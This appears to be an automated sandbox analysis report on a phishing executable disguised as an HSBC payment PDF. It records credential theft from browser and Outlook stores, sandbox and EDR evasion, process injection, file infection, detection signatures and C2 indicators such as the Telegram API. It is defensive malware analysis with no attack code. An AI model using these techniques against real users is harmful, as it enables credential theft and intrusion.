                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
                  Source: Spectrum.exe, 00000013.00000003.2172503001.000000000053E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: Spectrum.exe, 00000013.00000002.3340989454.000000000050B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000ce
                  Source: Spectrum.exe, 00000013.00000003.2173589554.0000000000530000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Deviceb
                  Source: Spectrum.exe, 00000013.00000003.2172503001.000000000053E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00|
                  Source: Spectrum.exe, 00000013.00000003.2172503001.000000000053E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #TSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: Spectrum.exe, 00000013.00000003.2172258542.0000000000535000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000013.00000003.2172372849.0000000000535000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure DriverT
                  Source: Spectrum.exe, 00000013.00000002.3340989454.000000000050B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @oem2.infloc.vmwarebusdevicedescVMware VMCI Bus Devicer
                  Source: Spectrum.exe, 00000013.00000003.2173471818.0000000000546000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: Spectrum.exe, 00000013.00000003.2173548889.0000000000536000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000013.00000002.3350961380.0000000000538000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000013.00000003.2173589554.0000000000536000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
                  Source: armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2148708963.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2555995836.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2787944261.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2121150907.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2169195097.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2690542196.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2187355202.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2169578065.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2331182641.000000000098F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Spectrum.exe, 00000013.00000003.2172258542.0000000000526000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000013.00000003.2173471818.0000000000546000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
                  Source: Spectrum.exe, 00000013.00000003.2173589554.0000000000536000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 000VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus DeviceP
                  Source: RegSvcs.exe, 00000011.00000002.3350551229.00000000014EA000.00000004.00000020.00020000.00000000.sdmp, snmptrap.exe, 00000012.00000002.3341028754.00000000005A3000.00000004.00000020.00020000.00000000.sdmp, ssh-agent.exe, 00000015.00000002.3343746783.000000000052C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Spectrum.exe, 00000013.00000003.2173471818.0000000000546000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: Spectrum.exe, 00000013.00000003.2172258542.0000000000526000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000013.00000003.2173471818.0000000000546000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driver`
                  Source: Spectrum.exe, 00000013.00000002.3340989454.000000000050B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: STNECVMWar VMware SATA CD00J
                  Source: Spectrum.exe, 00000013.00000003.2173548889.0000000000536000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000013.00000003.2173589554.0000000000536000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter<wS
                  Source: Spectrum.exe, 00000013.00000003.2173471818.0000000000546000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
                  Source: AppVClient.exe, 00000007.00000002.2110084231.00000000004AE000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.2109436235.0000000000497000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.2109339753.0000000000490000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appv:SoftwareClients/appv:JavaVirtualMachineg
                  Source: Spectrum.exe, 00000013.00000003.2173471818.0000000000546000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4NECVMWar VMware SATA CD00
                  Source: Spectrum.exe, 00000013.00000003.2172503001.000000000053E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Spectrum.exe, 00000013.00000003.2172372849.0000000000535000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
                  Source: Spectrum.exe, 00000013.00000002.3340989454.000000000050B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @oem2.infloc.vmwarebusdevicedescVMware VMCI Bus DeviceV
                  Source: Spectrum.exe, 00000013.00000003.2173548889.0000000000536000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000013.00000002.3350961380.0000000000538000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000013.00000003.2173589554.0000000000536000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructb$
                  Source: Spectrum.exe, 00000013.00000003.2173589554.0000000000530000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: Spectrum.exe, 00000013.00000003.2173471818.0000000000546000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JVMware Virtual disk SCSI Disk Device
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_068E4560 LdrInitializeThunk,LdrInitializeThunk,17_2_068E4560
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_007008F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_007008F1
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006C1130 mov eax, dword ptr fs:[00000030h]15_2_006C1130
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_007034CD mov eax, dword ptr fs:[00000030h]15_2_007034CD
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_007008F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_007008F1
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_0070420B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_0070420B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Found direct / indirect Syscall (likely to bypass EDR)
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtOpenKeyEx: Indirect: 0x140077B9BJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtQueryValueKey: Indirect: 0x140077C9FJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtClose: Indirect: 0x140077E81
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 110F008Jump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"Jump to behavior
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTD4C9.tmp VolumeInformationJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTD4CA.tmp VolumeInformationJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\perfhost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\Spectrum.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\TieringEngineService.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 GetVolumeInformationW,GetWindowsDirectoryW,CreateThread,CreateThread,GetLastError,GetWindowsDirectoryW,CreateThread,GetUserNameW,GetLastError,GetComputerNameW,CreateThread,GetVolumeInformationW,CreateThread,GetUserNameW,GetLastError,15_2_006E7960
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected MassLogger RAT
                  Source: Yara matchFile source: 17.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7188, type: MEMORYSTR
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 17.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7188, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 17.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7188, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected MassLogger RAT
                  Source: Yara matchFile source: 17.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7188, type: MEMORYSTR
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 17.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7188, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Native API                  		2
                  LSASS Driver                  		1
                  Abuse Elevation Control Mechanism                  		1
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  System Time Discovery                  		1
                  Taint Shared Content                  		1
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  DLL Side-Loading                  		2
                  LSASS Driver                  		1
                  Abuse Elevation Control Mechanism                  		11
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		1
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading                  		3
                  Obfuscated Files or Information                  		Security Account Manager1
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook212
                  Process Injection                  		1
                  Software Packing                  		NTDS113
                  System Information Discovery                  		Distributed Component Object Model11
                  Input Capture                  		3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Timestomp                  		LSA Secrets211
                  Security Software Discovery                  		SSHKeylogging14
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials1
                  Process Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items222
                  Masquerading                  		DCSync21
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                  Virtualization/Sandbox Evasion                  		Proc Filesystem1
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                  Process Injection                  		/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Network Configuration Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572924 Sample: HSBC Payment Notification S... Startdate: 11/12/2024 Architecture: WINDOWS Score: 100 38 reallyfreegeoip.org 2->38 40 api.telegram.org 2->40 42 21 other IPs or domains 2->42 56 Multi AV Scanner detection for domain / URL 2->56 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 66 14 other signatures 2->66 7 armsvc.exe 1 2->7         started        12 HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe 3 2->12         started        14 elevation_service.exe 2->14         started        16 18 other processes 2->16 signatures3 62 Tries to detect the country of the analysis system (by using the IP) 38->62 64 Uses the Telegram API (likely for C&C communication) 40->64 process4 dnsIp5 50 ww99.przvgke.biz 72.52.179.174, 49713, 80 LIQUIDWEBUS United States 7->50 52 lpuegx.biz 82.112.184.197, 49742, 49792, 49844 FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU Russian Federation 7->52 54 7 other IPs or domains 7->54 22 C:\Windows\System32\wbengine.exe, PE32+ 7->22 dropped 24 C:\Windows\System32\wbem\WmiApSrv.exe, PE32+ 7->24 dropped 26 C:\Windows\System32\vds.exe, PE32+ 7->26 dropped 34 126 other malicious files 7->34 dropped 72 Drops executable to a common third party application directory 7->72 74 Infects executable files (exe, dll, sys, html) 7->74 28 C:\Windows\System32\msiexec.exe, PE32+ 12->28 dropped 30 C:\Windows\System32\msdtc.exe, PE32+ 12->30 dropped 32 C:\Windows\System32\alg.exe, PE32+ 12->32 dropped 36 12 other malicious files 12->36 dropped 76 Binary is likely a compiled AutoIt script file 12->76 78 Writes to foreign memory regions 12->78 80 Maps a DLL or memory area into another process 12->80 18 RegSvcs.exe 15 2 12->18         started        82 Found direct / indirect Syscall (likely to bypass EDR) 14->82 84 Creates files inside the volume driver (system volume information) 16->84 86 Contains functionality to behave differently if execute on a Russian/Kazak computer 16->86 file6 signatures7 process8 dnsIp9 44 api.telegram.org 149.154.167.220, 443, 49716 TELEGRAMRU United Kingdom 18->44 46 checkip.dyndns.com 193.122.6.168, 49709, 80 ORACLE-BMC-31898US United States 18->46 48 reallyfreegeoip.org 172.67.177.134, 443, 49711 CLOUDFLARENETUS United States 18->48 68 Tries to steal Mail credentials (via file / registry access) 18->68 70 Tries to harvest and steal browser information (history, passwords, etc) 18->70 signatures10

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe82%ReversingLabsWin32.Virus.Expiro
                  HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe100%AviraW32/Infector.Gen
                  HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Au3Check.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Au3Info.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%AviraW32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Au3Check.exe100%Joe Sandbox ML
